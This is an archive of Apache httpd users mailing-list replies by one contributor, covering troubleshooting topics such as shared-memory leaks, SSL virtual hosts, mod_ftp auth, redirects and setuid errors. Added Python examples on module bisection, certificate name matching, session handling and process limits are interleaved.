Re: [us...@httpd] Re: httpd is creating large number of shared memory segments.

2009-06-26 Thread Scott Gifford
"Chandranshu ."  writes:

> We changed our script that used to do a graceful restart to also
> record the number of shared memory segments before and after the
> restart. Plotting the number of shm segments vs. the number of times
> the server was restarted gracefully was almost a straight line.

Hello Chandranshu,

When you do a graceful server restart, Apache asks the children to
exit when it's convenient and starts up new children.  So it would not
surprise me to see a short spike in resource consumption until the old
child processes complete.  It would surprise me if it didn't return to
normal after a few minutes, though, and you're seeing the increased
shared memory segments until a server restart, right?  And you suspect
it's a leak somewhere?

A strategy for figuring out what's causing this would be to start off
with a minimal Apache configuration.  You could create a new conf file
with all modules disabled listening on another port and look for the
leak there.  If you still see it, it must be in the Apache core;
otherwise it's in a module.  Keep enabling modules until you start
seeing it, then you know what module it is (you can also enable and
disable groups of modules to do a sort of binary search).  If with the
same set of modules as your production server you still don't see a
leak, it must be some code running under your server, and you can use
the same sort of process to bring in different pieces of code until
you see the leak.

Hope this helps, and good luck!

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See <http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
   "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org
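
The bisection Scott describes, as an added example (not part of the thread): a parser for the Linux `ipcs -m` table to get the segment count, a check that the count keeps climbing across restarts, and the enable-half-the-modules search with the actual trial supplied as a callable. It assumes a single responsible module and that the core alone does not leak; the ipcs output embedded below is constructed.

```python
"""Count System V shared memory segments and bisect the module list.

Added example, not from the thread. `count_shm_segments` parses the Linux
`ipcs -m` table; `find_leaking_module` is the enable-half-the-modules search
described in the reply, with the actual trial (write a minimal conf on a
spare port, restart gracefully a few times, compare counts) supplied as a
callable. Assumes exactly one module is responsible and that the core alone
does not leak. The ipcs output below is constructed.
"""
import subprocess
from typing import Callable, List, Optional

# Constructed sample of `ipcs -m` output (Linux util-linux layout)
SAMPLE_IPCS = """\
------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status
0x00000000 32768      www-data   600        1048576    2          dest
0x00000000 65537      www-data   600        1048576    2          dest
0x0052e2c1 98306      root       644        4096       0
"""


def count_shm_segments(ipcs_output: str) -> int:
    """Number of segment rows: a row starts with a hex key, header lines do not."""
    count = 0
    for line in ipcs_output.splitlines():
        fields = line.split()
        if fields and fields[0].startswith("0x"):
            count += 1
    return count


def current_shm_count() -> int:
    """Same count on the live host (util-linux `ipcs` assumed on PATH)."""
    out = subprocess.run(["ipcs", "-m"], capture_output=True, text=True, check=True).stdout
    return count_shm_segments(out)


def grows_across_restarts(count: Callable[[], int], restart: Callable[[], None],
                          restarts: int = 5) -> bool:
    """True if the segment count climbs with every restart (the straight line
    the original poster plotted) rather than settling back down."""
    before = count()
    for _ in range(restarts):
        restart()
    return count() - before >= restarts


def find_leaking_module(modules: List[str],
                        leaks_with: Callable[[List[str]], bool]) -> Optional[str]:
    """Binary search over `modules`. `leaks_with(enabled)` runs one trial with
    exactly those modules enabled and reports whether the leak appeared."""
    if not leaks_with(modules):
        return None  # not in any listed module: look at the application code next
    candidates = list(modules)
    while len(candidates) > 1:
        half = len(candidates) // 2
        first = candidates[:half]
        candidates = first if leaks_with(first) else candidates[half:]
    return candidates[0]


if __name__ == "__main__":
    print("segments in sample:", count_shm_segments(SAMPLE_IPCS))
```

In practice `leaks_with` would write a conf enabling only the given modules on a spare port, call `grows_across_restarts` with `current_shm_count` and a graceful-restart command, and return the result; each trial costs a handful of restarts, so the halving keeps the total small even for a long module list.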



Re: [us...@httpd] Need some SSL help please.

2009-08-07 Thread Scott Gifford
Josh Gooding  writes:

[...]

> Run the Login.jsp through SSL, after successful login, drop the SSL.  The
> entire session doesn't need to be encrypted, only the login and password.

Sure, that's possible.  The general strategy is to accept the username
and password on a secure connection, and if they are correct generate
a session ID which can be used for future authentication.  You can
return this to the browser in a form or the URL (maybe in a cookie,
not sure if cookies can be passed between HTTP and HTTPS sites), and
the non-encrypted part of your application would just check that the
session ID is valid.

I don't know of an Apache module that will do this for you, and I
don't know anything about Tomcat, but at a high level that's a common
approach.

Hope this helps,

Scott.




[us...@httpd] Different Limit rules on the same directory with mod_ftp

2009-10-27 Thread Scott Gifford
Hello,

I'm using mod_ftp to provide authenticated FTP access to a Web
directory.  It is mostly read-only, but a few users should have write
access to the directory.  I am using mod_auth_mysql with groups for
authentication; there is a reader group and a writer group, and the
user with write access is in both groups.

Everything works OK if I just provide read access or write access, but
when I try to provide one group for write access and another for read
access, it ends up providing both groups with read-write access.  My
rules look like this:

  
  Include mysql_auth.conf

  require group writer


  Include idx_auth.conf
  require group reader

  

I am not really sure how to troubleshoot this.

Does anybody have a similar configuration working, or any other
advice?

Thanks!

---Scott.





Re: [us...@httpd] Different Limit rules on the same directory with mod_ftp

2009-10-27 Thread Scott Gifford
Nick Kew  writes:

> Scott Gifford wrote:
>> Hello,
>> I'm using mod_ftp to provide authenticated FTP access to a Web
>> directory.  It is mostly read-only, but a few users should have write
>> access to the directory.  I am using mod_auth_mysql with groups for
>
> What mod_auth_mysql?
>
> There are several third-party modules with that name.  

I am using the Debian package libapache2-mod-auth-mysql, which is
targeted to Apache 2.2.  The package is for version 4.3.9-11, and it
includes mod_auth_mysql.so and has a copyright of:

* Copyright (c) 2001 by J. R. Westmoreland 
* Portions Copyright (c) 2002-2004 by Matthew Palmer 

> They are essentially obsoleted by the DBD framework in HTTPD/2.2.
> So you are probably using a module written for the HTTPD/2.0 authnz
> framework rather than the 2.2 one.

I could switch to the DBD framework if that is likely to help with the
problem at hand.  I used this mod_auth_mysql module because it was
readily available in Debian and I was able to find some example code
and get it working quickly, but am otherwise not attached to it.

>>   
>>   Include mysql_auth.conf
>> 
>>   require group writer
>> 
>> 
>>   Include idx_auth.conf
>>   require group reader
>> 
>>   
>
> What's in those Includes?   is not a general-purpose
> container, so it may not work as you expect on some or all
> of the contents of idx_auth.conf.

There is really only one file; I made an error cleaning up my email
message and changed the name in one place but not the other.  It is
basically configuration options for mod_auth_mysql.  I have tried
including it only in the containing  element, in both
 elements, and in just the second  element.  Here are
the contents, with passwords elided:

# Disable other auth modules
AuthBasicAuthoritative Off
AuthUserFile /dev/null

# Configure Auth_MySQL
Auth_MySQL on
Auth_MySQL_Host localhost
Auth_MySQL_User apache_auth
Auth_MySQL_Password xxx
Auth_MySQL_DB idx_users
Auth_MySQL_Password xxx
Auth_MySQL_Group_Table users
Auth_MySQL_Username_Field user
Auth_MySQL_Password xxx
Auth_MySQL_Group_Field groups
Auth_MySQL_Encryption_Types Crypt
Auth_MySQL_Empty_Password xxx
Auth_MySQL_Authoritative on

AuthName "My Auth"
AuthType basic

What would be really useful is some hints for troubleshooting this.  I
can't tell if mod_ftp is misbehaving, or mod_auth_mysql, or Apache, or
if everything is behaving as designed and I just misunderstand what
it's doing.  I can't figure out a way to nail it down so I can take a
closer look at just one part.

Thanks for any advice!

Scott.




Re: [us...@httpd] equivalent of http://httpd.apache.org/docs/1.3/misc/howto.html#logreset

2009-12-17 Thread Scott Gifford
Shibi NS  writes:

> Is there any equivalent of http://httpd.apache.org/docs/1.3/misc/howto.html#logreset
> in apache 2.X

The information there still applies, although "apachectl graceful" or
"apache2ctl graceful" is preferred over kill -1 `cat httpd.pid`
nowadays.

Scott.




Re: [us...@httpd] Getting HTTP Headers from CGI program

2009-12-31 Thread Scott Gifford
André Warnier  writes:

> Tushar Joshi wrote:
>> Hi thanks for the reply. I'm writing my applications in C so would
>> have thought there might be a low level way of doing this.

[...]

> But, in general, if this is a CGI program, then it is running as a
> separate process from Apache itself, and it does not have access to
> Apache internals.
> What your program gets is the CGI environment as set up by Apache, but
> you do not get all the HTTP request headers that way (only some are
> "translated" by Apache as environment variables for your CGI
> program).

It would be fairly straightforward to copy additional information from
Apache to the environment with a little bit of mod_perl or a simple
module, to make it available to CGI scripts.

Scott.




Re: [us...@httpd] Apache vs LiteSpeed

2010-01-12 Thread Scott Gifford
On Wed, Jan 13, 2010 at 1:31 AM, Jarrod Slick wrote:

> Apache Users,
>
> As some of you may or may not know a fairly prominent commercial webserver,
> LiteSpeed, claims to outperform even a well configured Apache 2.2.x
> installation by orders of magnitude.  They have some internal benchmarks
> that appear to back this up, but, being a natural skeptic, I wanted to test
> it out for myself.  So I've agreed to pit Apache and LiteSpeed (as well as a
> few other webservers) against one another in benchmarking tests on a 2x Xeon
> 5520 machine.  I, and hopefully others, will be configuring Apache.
>  LiteSpeed will be configuring their product.
>

What is the workload you are benchmarking?  Static pages, PHP/mod_perl code,
CGI, etc.?  Is the client a benchmark tool or a browser, and where on the
network is it relative to the server?  How are you measuring performance
(page load times, requests/second, etc.)?

-Scott.


Re: [us...@httpd] Apache vs LiteSpeed

2010-01-14 Thread Scott Gifford
On Wed, Jan 13, 2010 at 2:08 AM, Jarrod Slick wrote:

>
> On Jan 13, 2010, at 12:47 AM, Scott Gifford wrote:
>
> On Wed, Jan 13, 2010 at 1:31 AM, Jarrod Slick wrote:
>
>> Apache Users,
>>
>> As some of you may or may not know a fairly prominent commercial
>> webserver, LiteSpeed, claims to outperform even a well configured Apache
>> 2.2.x installation by orders of magnitude.  They have some internal
>> benchmarks that appear to back this up, but, being a natural skeptic, I
>> wanted to test it out for myself.  So I've agreed to pit Apache and
>> LiteSpeed (as well as a few other webservers) against one another in
>> benchmarking tests on a 2x Xeon 5520 machine.  I, and hopefully others, will
>> be configuring Apache.  LiteSpeed will be configuring their product.
>>
>
> What is the workload you are benchmarking?  Static pages, PHP/mod_perl
> code, CGI, etc.?  Is the client a benchmark tool or a browser, and where on
> the network is it relative to the server?  How are you measuring performance
> (page load times, requests/second, etc.)?
>
> -Scott.
>
>
> Scott,
>
> I'm open to suggestions on all fronts, but as it stands we were going to do
> the following with the ab tool:
>
> -small static pages test
> -large static pages test
> -hello world php test
>
> And we were going to also benchmark a wordpress/joomla site in a more
> "real-world" load simulation test using the tool "siege".
>

For smaller static content that will be fetched multiple times without
changing, consider mod_mem_cache, which will avoid most disk I/O for that
content.  For larger content or content that will just be fetched once or
change frequently, consider enabling sendfile or mmap for sending it.  For
PHP, use a PHP accelerator, such as eAccelerator, APC, or Zend.  For larger
applications, do your best to configure the different components
appropriately, for example with Drupal configure the static Javascript and
CSS files to be cached with mod_mem_cache, use the PHP accelerator for the
code, and if you have any large files make sure you have sendfile or mmap
available.  If the benchmark client will do any caching, make sure
expiration is configured to allow a long cache time.  Disable .htaccess
unless you need it, so Apache doesn't have to look for it.

Do a dry run while running top and iostat to see where your bottleneck is.
Try running Apache under strace to see what it's doing at each request, and
get it doing as little as possible.  If it is serving a file from the memory
cache or with a static mmap, strace should show it making practically no
system calls.

If you google around for Apache benchmark tuning I'm sure you'll find some
other ideas and examples.

Good luck!

Scott.


Re: [us...@httpd] Apache vs LiteSpeed

2010-01-15 Thread Scott Gifford
On Fri, Jan 15, 2010 at 12:08 PM, Jarrod Slick wrote:
[ ... ]

> And another question: how would you do it differently?  Sure, in an ideal
> world I could assemble my own botnet and then blast my corporate network
> with a gigabit of distributed traffic multiple times for each webserver --
> but obviously in the real world that's not going to happen.


IMO it's not necessary to simulate different connections from all over the
world, but it is true that the benchmark client will consume a substantial
amount of resources, which will affect your result.  Both should be skewed
about the same, so it should be a fair comparison, but things like
"requests/sec" will not be meaningful.

Using the live Internet may cause your network connection to be the
bottleneck, too, which could give bad results.

I think using a LAN/VLAN connection would be a fair measure.  You could also
consider running the tests as instances on Amazon EC2, which will let you
lease a small pool of servers for a few hours for $20 or so.

---Scott.


Re: [us...@httpd] can we run two SSL domains on one IP

2010-01-19 Thread Scott Gifford
On Tue, Jan 19, 2010 at 6:55 AM, Nilesh Govindarajan wrote:

>
> Oops. My bad. SSL protocol doesn't give the Host: header. So apache can't
> decide which Vhost to serve (from apache docs :D).
>

Though SSL doesn't itself provide a Host: header, the HTTP session on top of
it still does, so if you can get past the SSL layer virtual hosting will
work as usual.  As others have suggested, wildcard certs and
"subjectAltName" certs are two ways to make the SSL layer accept multiple
certs.  I have successfully used wildcard certs and name-based virtual
hosting together.

-Scott.
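
How a wildcard or subjectAltName certificate covers several names on one IP, as an added example (not from the thread): given the DNS names already extracted from a certificate and the host the client asked for, decide whether the certificate covers it, then pick the vhost whose certificate fits. The wildcard rules follow what browsers enforce: `*` only as the whole leftmost label, matching exactly one label, and never standing in for a bare domain. The vhost table is constructed for the example.

```python
"""Hostname-to-certificate matching for name-based SSL virtual hosts.

Added example, not from the thread. Inputs are the DNS names a certificate
carries (CN / subjectAltName entries, already extracted) and the requested
host. The VHOSTS table below is constructed.
"""
import ipaddress
from typing import Dict, Iterable, List, Optional


def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def hostname_matches(cert_names: Iterable[str], hostname: str) -> bool:
    """True if any DNS name on the certificate covers `hostname`."""
    host = hostname.rstrip(".").lower()
    if _is_ip_literal(host):
        return False  # IP literals need an IP-address SAN, never a DNS name
    host_labels = host.split(".")
    for name in cert_names:
        labels = name.rstrip(".").lower().split(".")
        if len(labels) != len(host_labels):
            continue  # a wildcard spans one label only, so label counts must agree
        if labels[0] == "*":
            # *.example.com covers www.example.com but not example.com,
            # not a.b.example.com, and *.com is refused outright
            if len(labels) >= 3 and labels[1:] == host_labels[1:]:
                return True
            continue
        if "*" in name:
            continue  # partial-label wildcards such as w*.example.com are not honoured
        if labels == host_labels:
            return True
    return False


def select_vhost(vhosts: Dict[str, List[str]], requested_host: str) -> Optional[str]:
    """Pick the vhost whose certificate covers the requested name. `vhosts`
    maps a vhost label to the DNS names on the cert it would present.
    None means no cert fits, i.e. the client would see a name mismatch."""
    for label, names in vhosts.items():
        if hostname_matches(names, requested_host):
            return label
    return None


# Constructed vhost table: each entry is the name list on that vhost's cert
VHOSTS = {
    "wildcard-site": ["*.example.com", "example.com"],
    "other-site": ["shop.example.net", "www.example.net"],
}

if __name__ == "__main__":
    for host in ("www.example.com", "example.com", "a.b.example.com", "shop.example.net"):
        print(host, "->", select_vhost(VHOSTS, host))
```

The same check is what a client performs after the handshake, so a name the function rejects is a name the browser will warn about; the one-label rule is why a single `*.example.com` certificate cannot also serve `a.b.example.com`.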


Re: [us...@httpd] observed delay for changing process owner

2010-02-15 Thread Scott Gifford
On Mon, Feb 15, 2010 at 10:43 AM, Harald Falkenberg <
harald.falkenb...@desy.de> wrote:
[ ... ]

> Now I observed that it takes a long time to change the ownership of the
> processes, which I set via the 'user' and 'group' directives in httpd.conf.
> After the ownership changed, the processes serve immediately the requests.
>

I am not sure how you have observed this, but my suspicion is you are
observing a side-effect of the delay, not the cause of the delay itself.
One possibility is that your configuration requires a large number of DNS
resolutions; others have suggested other possibilities.

Apart from educated guessing, I unfortunately don't know of a better way to
debug this than to comment out parts of the configuration to see what is
causing the delay.  I suspect if you start with a minimal configuration you
will find that the process user and group are changed very quickly.


> Did anybody observe something simular and has an idea what might cause this
> long delay in changing the ownership? Is it possible to to debug the startup
> phase of the apache, to see were the processes spend their time?
>

A tool to debug this would be extremely useful, but unfortunately I'm not
aware of any.

-Scott.


Re: [us...@httpd] Can I have 2 httpd servers running on 2 different ports?

2010-02-22 Thread Scott Gifford
On Mon, Feb 22, 2010 at 2:09 PM, Aruna Gummalla wrote:

> Hi,
>
> Can I have 2 httpd servers running on 2 different ports?
>

Sure.  You'll want to create a new configuration file and start Apache using
that configuration file.  You can run Apache by hand, or you can copy
apache2ctl and change the settings in there, then run your copy.

That's a bit vague, I know, but I hope it will get you started.  You may
find there's an easier answer if you don't really need two Apache servers,
but can get by with one of the other suggestions from this thread.

-Scott.


Re: [EMAIL PROTECTED] way for me to turn off if-modified-since & always return 304 reply ?

2008-09-12 Thread Scott Gifford
"dave selby" <[EMAIL PROTECTED]> writes:

> Is there a way for me to turn off if-modified-since so the client
> browser will ALWAYS use its locally cached document

Dave,

Usually sending an Expires header will tell browsers to mostly use a
cached version.  I use something like this to set my expires time to
quite a bit in the future:

   
  ExpiresActive On
  ExpiresDefault A8640
   

This is part of mod_expires:

http://httpd.apache.org/docs/2.0/mod/mod_expires.html

Also, it would really surprise me if Apache used the parent directory
in deciding about IMS requests.  You might want to do some simple
experiments to verify this is what it's doing.

Scott.




Re: X-Forwarded-For

2008-12-15 Thread Scott Gifford
"Mohit Anchlia"  writes:

> Our traffic is going through proxy, how can I enable X-Forwarded-For
> in apache to get the original IP. Does this also work for users using
> ISP (private IP) and are behind the ISP router.

Do you mean you have Apache acting as a proxy and you want it to send
the X-Forwarded-For header, or you have another proxy server and you
want Apache to do something with the information in its
X-Forwarded-For header?

Apache should generally send this information properly on its own,
see:

http://httpd.apache.org/docs/trunk/mod/mod_proxy.html

The easiest way to handle the headers is on the application side.
ISPs may use proxies, too, so if you only want special treatment for
requests from your own proxy, you should check the IP address of the
connection, and if it's your proxy use the information from the last
X-Forwarded-For header, which should always be the one it added (you
can also use the Via header).  For an example in PHP see:

http://devcentral.f5.com/weblogs/macvittie/archive/2008/06/02/3323.aspx

That's how I've always done it, but there are some modules that claim
to do some of this work for you so you could avoid changing your Web
apps:

http://www.cotds.org/mod_extract_forwarded2/

http://search.cpan.org/~jvanasco/Apache2-xForwardedFor-0.04/lib/Apache2/xForwardedFor.pm

I haven't used either, and there may be others.

Good luck!

Scott.




Re: [us...@httpd] 'safe' way dismount a usb drive?

2009-01-04 Thread Scott Gifford
Foo JH  writes:

> I've managed to mount/umount a USB drive.  But I'm not sure if there are
> any other commands I need to execute, as a best practice, before I
> physically unplug it.

Not sure what this has to do with Apache; are you serving Web files
from the USB drive?

At any rate, unmounting the drive should do everything necessary to
prepare it for removal.

Scott.




Re: [us...@httpd] Lags on simple static file requests

2009-01-06 Thread Scott Gifford
"Paul Prescod"  writes:

> I grep my logs every day for slow queries. Sometimes I see a dynamic
> request in there and I go and optimize the code. But more concerning
> is when I see simple serving of very small static files on a very
> underloaded machine. I am looking for hints about the source.

Hi Paul,

I have noticed these lines in my logs occasionally, too.  I have
always chalked them up to slow clients, or clients who fall off the
network after sending the request.

I don't know the details of exactly how Apache calculates this time,
though.  Perhaps somebody more familiar with the internals of Apache
can provide some details.

-Scott.




Re: [us...@httpd] Redirecting request from HTTP to HTTPS

2009-04-19 Thread Scott Gifford
"Tarun Narang"  writes:

> How could I redirect all my requests for http to https ?

Hello Tarun,

We use RedirectMatch for this.  See:

http://httpd.apache.org/docs/2.0/mod/mod_alias.html#redirectmatch

> However, I have to redirect the non SSL request to SSL request, like when the
> user requests for http://localhost:8080/hsbc it should be redirected to

Try something like this:

RedirectMatch ^/hsbc(.*)$ https://localhost:4430/hsbc$1

I hope this helps, I'm not sure I understood exactly what you were
asking in your message.

Good luck!

Scott.




Re: [EMAIL PROTECTED] HTTP AUTH

2005-12-26 Thread Scott Gifford
Christopher Deeley <[EMAIL PROTECTED]> writes:

> I would like to set up a user folder for each user on my site and
> the only method I know to stop anyone but the user accessing that
> folder is to use htaccess to require the valid user. I have PHP
> running as a module on Apache.  Is there a way to pass username &
> password from a form to a php script which will set the values of
> $_SERVER['HTTP_AUTH_USER'] and $_SERVER['HTTP_AUTH_PW'] ? I
> currently have a page which does the usual pop-up login box thingy
> so these values are set automatic but I would like to get rid of it.

No, you have to use cookies if you want a Web form instead of the
standard popup.  You can use mod_perl and Apache::AuthCookie to do
this without writing much code.

> Also if there a way to logout?

It's client-specific; Firefox provides a way to logout, IE does not.

> I used to use sessions to validate the user and restrict access to
> pages but I found people could still access pictures. Is there a way
> to use a form based login (like I did before with sessions) and
> still restrict access to a folder by only allowing one user in?

I would also look into using Apache::AuthCookie to do this.

Scott.

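
The session-ID scheme from the "Need some SSL help" thread above (credentials checked once on the secure connection, a session ID validated on every later request) and the cookie-based form login this thread points at are the same mechanism; here it is as one added example, not code from either thread or from Apache::AuthCookie. The user table, hashing parameters and cookie name are assumptions. One fact worth having next to the earlier thread's open question: a cookie is scoped to the host, not the scheme, so the browser sends it on both http:// and https:// requests unless the cookie carries the `Secure` attribute.

```python
"""Form-based login issuing a random session id, checked on later requests.

Added example, not from either thread. Credentials are verified once, a
session id is minted, every other request maps the id back to a user, and
logout is a server-side delete. PBKDF2_ROUNDS and COOKIE_NAME are assumptions.
"""
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple

PBKDF2_ROUNDS = 200_000  # assumption: tune to your hardware
COOKIE_NAME = "sid"       # assumption


def make_password_record(password: str) -> Tuple[bytes, bytes]:
    """Salted PBKDF2 record to store instead of the clear-text password."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def check_password(users: Dict[str, Tuple[bytes, bytes]], user: str, password: str) -> bool:
    """Constant-time comparison; an unknown user costs the same as a wrong password."""
    salt, stored = users.get(user, (b"\0" * 16, b"\0" * 32))
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return user in users and hmac.compare_digest(digest, stored)


@dataclass
class Session:
    user: str
    expires_at: float


class SessionStore:
    """In-memory session table keyed by a hash of the id, so a dump of the
    table does not hand out usable ids."""

    def __init__(self, ttl: float = 1800, clock: Callable[[], float] = time.time):
        self._sessions: Dict[str, Session] = {}
        self._ttl = ttl
        self._clock = clock

    @staticmethod
    def _key(sid: str) -> str:
        return hashlib.sha256(sid.encode()).hexdigest()

    def login(self, user: str, password: str,
              verify: Callable[[str, str], bool]) -> Optional[str]:
        """The HTTPS-only step: check credentials and mint a fresh session id."""
        if not verify(user, password):
            return None
        sid = secrets.token_urlsafe(32)  # 256 bits of randomness, not guessable
        self._sessions[self._key(sid)] = Session(user, self._clock() + self._ttl)
        return sid

    def user_for(self, sid: Optional[str]) -> Optional[str]:
        """The step every other request performs: id -> user, or None."""
        if not sid:
            return None
        sess = self._sessions.get(self._key(sid))
        if sess is None:
            return None
        if sess.expires_at <= self._clock():
            del self._sessions[self._key(sid)]
            return None
        return sess.user

    def logout(self, sid: str) -> None:
        """Server-side logout: the id stops working even if the browser keeps it."""
        self._sessions.pop(self._key(sid), None)


def build_cookie(sid: str, secure: bool) -> str:
    """Set-Cookie value. Without `Secure` the browser sends the cookie on both
    http:// and https:// requests to the same host, which the
    SSL-then-plain-HTTP scheme relies on; with it, the plain side never sees it."""
    attrs = [f"{COOKIE_NAME}={sid}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    return "; ".join(attrs)
```

Because the id is the only thing standing in for the password on the unencrypted requests, its lifetime (`ttl`) and the `logout` path are what limit the damage when one is observed on the wire; Apache::AuthCookie, mentioned above, handles the cookie issuing and checking inside the server rather than in application code.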



Re: [EMAIL PROTECTED] Can apache and ssh share port 80?

2006-03-31 Thread Scott Gifford
[EMAIL PROTECTED] writes:

[...]

> Ideally, I wish there were some kind of apache directives I could use
> so that httpd would continue to monitor port 80, and if it gets a
> connection that does not look like http or https, it would forward the
> bits to port 22.  But I doubt that is possible.

The easiest way to do this is set up another IP address on the
machine, and have ssh listen on port 80 of that address only.

---Scott.




Re: [EMAIL PROTECTED] Using apache as proxy only on specific folder

2007-05-09 Thread Scott Gifford
[EMAIL PROTECTED] writes:

> Hi all.
>
> I want to make apache2 (port 80) work like a proxy server to another
> webserver that is running on the same machine on port 3000.
>
> The following works perfectly for this: 
> ProxyPass / http://localhost:3000/
> ProxyPassReverse / http://localhost:3000/
>
> But what I want is that apache only send the user to this other webserver 
> when the user hits a specific folder, like
> http://10.0.0.1/otherwebserver
>
> Is this possible in apache2 (2.2.3-4)?

mod_rewrite can do this.  See the [P] "force proxy" flag.

Scott.




Re: [EMAIL PROTECTED] Overriding url filename changing in Apache

2007-05-16 Thread Scott Gifford
"Harry Spier" <[EMAIL PROTECTED]> writes:

> I have a website on a shared hosting Apache Linux server.

[...]

> I believe (but I'm not sure) that [...] mod-speling is enabled on
> that Apache server. This is the default behavior on the shared
> hosting server and they won't change it.
>
> I need to override that behavior in my domain so that a url to a
> non-existent file will always give a 404 error [...] Is there any way I can
> use my .htaccess file to override the server's changing the url

According to the docs, you can use the directive:

CheckSpelling off

in your .htaccess file to turn off mod_speling for just the files in
that directory:

http://httpd.apache.org/docs/2.0/mod/mod_speling.html

Hope this helps!

---Scott.




Re: [EMAIL PROTECTED] Is mod_ssl enough to authenticate?

2007-05-25 Thread Scott Gifford
"Naveen Rawat" <[EMAIL PROTECTED]> writes:

> Hi All,
>
> I want to authenticate modules (certificate based) against each other before
> any communication takes place. Modules may reside on local and remote
> servers. In both cases, is mod_ssl enough for authentication, or do I have to
> implement the authentication functionality in each module separately?
>
> I want to know if mod_ssl will authenticate other modules from a remote/local
> host, or if it authenticates clients only.

Yes, you can do this with mod_ssl.  See SSLVerifyClient to require
that a recognized certificate be used by the client, and
SSLCACertificateFile to list the CAs whose signatures you recognize.
You can create a CA, put that CA's certificate in there, and then sign
the client certificates (you'll probably want to look at
SSLCARevocationFile, too, to be able to revoke access to clients).
I've done that; you can probably also put all of the individual client
certificates in there.  Docs are here:

http://www.modssl.org/docs/2.8/ssl_reference.html

Scott.




Re: [EMAIL PROTECTED] Resource temporarily unavailable:,setuid: unable to change to uid: 502

2007-09-27 Thread Scott Gifford
kazekun <[EMAIL PROTECTED]> writes:

> Hello,
>
> I'm new to linux and had installed apache 2.2.6 on Fedora 7 about
> a month ago.  It seems to be working fine (still able to access the
> website) except that when I check the error log today (Sept. 27), I
> notice that there are some error messages
>
> [Wed Sep 26 13:13:38 2007] [alert] (11)Resource temporarily unavailable:
> setuid: unable to change to uid: 502

"Resource temporarily unavailable" is Unix error EAGAIN.  Here's what
the manpage for setuid(2) says on my system:

ERRORS
   EAGAIN The uid does not match the current uid and uid brings
   process over it's NPROC rlimit.

Hopefully that will get you pointed in the right direction.

[...]

> Then whenever the website is accessed, it gives the following message:
>
> [Wed Sep 26 13:13:45 2007] [error] [client 203.168.204.205] (22)Invalid
> argument: apr_global_mutex_lock(rewrite_log_lock) failed
> [Wed Sep 26 13:13:45 2007] [error] [client 203.168.204.205] (22)Invalid
> argument: apr_global_mutex_unlock(rewrite_log_lock) failed

That could be caused by the above error; if setuid fails it might not
have permission to grab that mutex.

Good luck!

---Scott.

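
The check that follows from the EAGAIN explanation above, as an added example (not from the thread): how many processes the target uid already owns versus the NPROC limit the httpd parent runs under. setuid() to an unprivileged uid fails with EAGAIN when that uid's process count would exceed the caller's RLIMIT_NPROC, so those two numbers are what to compare. It reads the Linux /proc layout; `proc_root` is a parameter so the functions can be exercised on a constructed tree, and the uid and pid values in the usage are placeholders.

```python
"""Diagnosing "setuid: unable to change to uid: N" (EAGAIN / NPROC).

Added example, not from the thread. Counts processes owned by a uid from
/proc/<pid>/status and reads the NPROC limit either from this process or
from /proc/<pid>/limits of a named process (the httpd parent). Linux /proc
layout assumed; `proc_root` exists so a constructed tree can stand in.
"""
import os
import resource
from typing import Dict, Optional, Tuple


def processes_owned_by(uid: int, proc_root: str = "/proc") -> int:
    """Count processes whose real uid is `uid` (the figure NPROC is checked against)."""
    count = 0
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "status")) as status:
                for line in status:
                    if line.startswith("Uid:"):
                        if int(line.split()[1]) == uid:  # second field is the real uid
                            count += 1
                        break
        except OSError:
            continue  # process exited while we were reading
    return count


def nproc_limit_of(pid: int, proc_root: str = "/proc") -> Tuple[Optional[int], Optional[int]]:
    """(soft, hard) RLIMIT_NPROC of a running process, read from
    /proc/<pid>/limits; None stands for 'unlimited'."""
    with open(os.path.join(proc_root, str(pid), "limits")) as limits:
        for line in limits:
            if line.startswith("Max processes"):
                fields = line.split()
                soft, hard = fields[2], fields[3]
                return (None if soft == "unlimited" else int(soft),
                        None if hard == "unlimited" else int(hard))
    raise ValueError("no 'Max processes' line in limits file")


def nproc_headroom(uid: int, parent_pid: Optional[int] = None,
                   proc_root: str = "/proc") -> Dict[str, object]:
    """Compare the uid's process count with the limit that applies. With a
    pid (the httpd parent) use that process's limit, otherwise this process's own."""
    if parent_pid is not None:
        soft, hard = nproc_limit_of(parent_pid, proc_root)
    else:
        raw_soft, raw_hard = resource.getrlimit(resource.RLIMIT_NPROC)
        soft = None if raw_soft == resource.RLIM_INFINITY else raw_soft
        hard = None if raw_hard == resource.RLIM_INFINITY else raw_hard
    running = processes_owned_by(uid, proc_root)
    return {"uid": uid, "running": running, "soft_limit": soft, "hard_limit": hard,
            "at_limit": soft is not None and running >= soft}


if __name__ == "__main__":
    # Placeholder values: substitute the uid from the error and the httpd parent pid
    print(nproc_headroom(uid=502, parent_pid=None))
```

A result with `at_limit` true points at a runaway set of processes under that uid (or a limits.conf entry that is far too low) rather than at Apache itself; the mutex errors the thread goes on to mention are then downstream of the failed setuid.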



Re: [users@httpd] mod_rewrite: Overwriting REMOTE_ADDR with HTTP_X_FORWARDED_FOR

2005-06-24 Thread Scott Gifford
Werner Schalk <[EMAIL PROTECTED]> writes:

> Hi,
>
> well apologies for bringing this issue up again but none of the suggested 
> solutions actually does work. I tried the following output filter:

Why do you need to solve it exactly this way?  Can't you instruct your
code or your Apache to simply consult HTTP_X_FORWARDED_FOR instead of
or in addition to REMOTE_ADDR?

It looks like your application is in PHP.  Can't you simply set the
environment variables how you want them when your code starts running,
perhaps using a library if you need to do it many places?

ScottG.




Re: [users@httpd] mod_rewrite: Overwriting REMOTE_ADDR with HTTP_X_FORWARDED_FOR

2005-06-24 Thread Scott Gifford
Werner Schalk <[EMAIL PROTECTED]> writes:

> Hi,
>
> well of course I could use HTTP_X_FORWARDED_FOR instead of REMOTE_ADDR in all 
> my scripts but the problem is that I have some customers and their scripts 
